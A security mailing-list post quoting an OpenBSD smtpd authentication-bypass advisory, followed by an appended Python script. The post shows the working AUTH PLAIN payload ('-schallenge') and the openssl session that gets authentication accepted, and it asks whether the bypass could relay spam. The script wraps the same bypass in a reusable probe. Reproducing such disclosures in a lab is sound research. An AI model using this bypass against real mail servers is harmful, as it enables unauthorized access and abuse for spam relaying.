Hi,

from https://seclists.org/oss-sec/2019/q4/120

==============================================================================
1.2. Case study: smtpd
==============================================================================

To demonstrate how smtpd's authentication can be bypassed, we follow the
instructions from the manual page of smtpd.conf:

------------------------------------------------------------------------------
     In this second example, the aim is to permit mail delivery and
     relaying only for users that can authenticate (using their normal login
     credentials).
           ...
           listen on egress tls pki mail.example.com auth
           ...
           match auth from any for any action "outbound"
------------------------------------------------------------------------------

and we restart smtpd. Then, with our remote-attacker hat on:

------------------------------------------------------------------------------
$ printf '\0-schallenge\0whatever' | openssl base64
AC1zY2hhbGxlbmdlAHdoYXRldmVy

$ openssl s_client -connect 192.168.56.121:25 -starttls smtp
...
EHLO client.example.com
...
AUTH PLAIN AC1zY2hhbGxlbmdlAHdoYXRldmVy
235 2.0.0 Authentication succeeded
------------------------------------------------------------------------------


I did verify that this attack worked on my unpatched OpenBSD 6.6 box.
But I didn't get much further. After the authentication succeeded
I continued with MAIL FROM: and RCPT TO:. After the RCPT TO: the
connection was aborted. After I patched my system I could no longer get
a "235 2.0.0 Authentication succeeded" message.

Question is: would it have been possible in the "real world" to exploit
this to relay arbitrary messages (e.g. spam)?

Regards,

Henry
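The exchange quoted above, as an added example that is not part of Henry's message or of the Qualys advisory he quotes: a small Python helper that builds the SASL PLAIN initial response exactly as the `printf | openssl base64` one-liner does (RFC 4616: authzid, NUL, authcid, NUL, password, then base64), decodes it back so you can see the three fields the server receives, and runs the same EHLO / STARTTLS / AUTH PLAIN sequence against a lab host with Python's standard `smtplib`. The function names, the `probe()` parameters and the reply-code classification are my own choices; the username `-schallenge` and password `whatever` are the ones from the quoted advisory. Nothing here changes what the server does; it only reproduces the client side and reports the reply code.

```python
"""Reproduce the AUTH PLAIN exchange from the quoted advisory (added example)."""
import base64
import smtplib
import ssl


def auth_plain_token(authzid: str, authcid: str, passwd: str) -> str:
    """Encode a SASL PLAIN initial response (RFC 4616) as base64.

    Wire format is: authzid NUL authcid NUL passwd. For the advisory's
    test, authzid is empty, authcid is "-schallenge" and passwd is "whatever".
    """
    raw = authzid.encode() + b"\0" + authcid.encode() + b"\0" + passwd.encode()
    return base64.b64encode(raw).decode("ascii")


def decode_auth_plain(token: str) -> tuple:
    """Split a PLAIN token back into (authzid, authcid, passwd).

    Useful when reading a capture or a server log: it shows the literal
    username field the daemon hands to its authentication backend.
    """
    parts = base64.b64decode(token).split(b"\0")
    if len(parts) != 3:
        raise ValueError("PLAIN response must have exactly three NUL-separated fields")
    return tuple(p.decode("utf-8", errors="replace") for p in parts)


def classify_reply(code: int) -> str:
    """Map the SMTP reply code to the AUTH command's outcome (RFC 4954)."""
    if code == 235:
        return "authenticated"
    if code == 334:
        return "continuation"  # server wants more SASL data
    if code in (454, 530, 535, 538):
        return "rejected"
    return "other"


def probe(host: str, port: int = 25, authcid: str = "-schallenge",
          passwd: str = "whatever", helo: str = "client.example.com",
          timeout: float = 10.0) -> tuple:
    """Run EHLO / STARTTLS / AUTH PLAIN against a lab host (assumed parameters).

    Returns (reply_code, outcome, reply_text). Certificate verification is
    disabled because a lab MTA normally has a self-signed certificate; do not
    reuse that setting outside a test network.
    """
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    with smtplib.SMTP(host, port, timeout=timeout) as smtp:
        smtp.ehlo(helo)
        smtp.starttls(context=ctx)
        smtp.ehlo(helo)  # re-EHLO after STARTTLS, as the RFC requires
        code, msg = smtp.docmd("AUTH PLAIN " + auth_plain_token("", authcid, passwd))
        return code, classify_reply(code), msg.decode("utf-8", errors="replace")


if __name__ == "__main__":
    # Offline part: the token must match the advisory's one-liner output.
    token = auth_plain_token("", "-schallenge", "whatever")
    print("AUTH PLAIN", token)
    print("decodes to", decode_auth_plain(token))
    # Online part against a lab host (constructed address; adjust as needed):
    # print(probe("192.168.56.121"))
```

A `235` reply from an smtpd that has no account named `-schallenge` is the signal described in the advisory; after the patch the same probe should produce a `535`-class reply, which `classify_reply()` reports as `rejected`.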
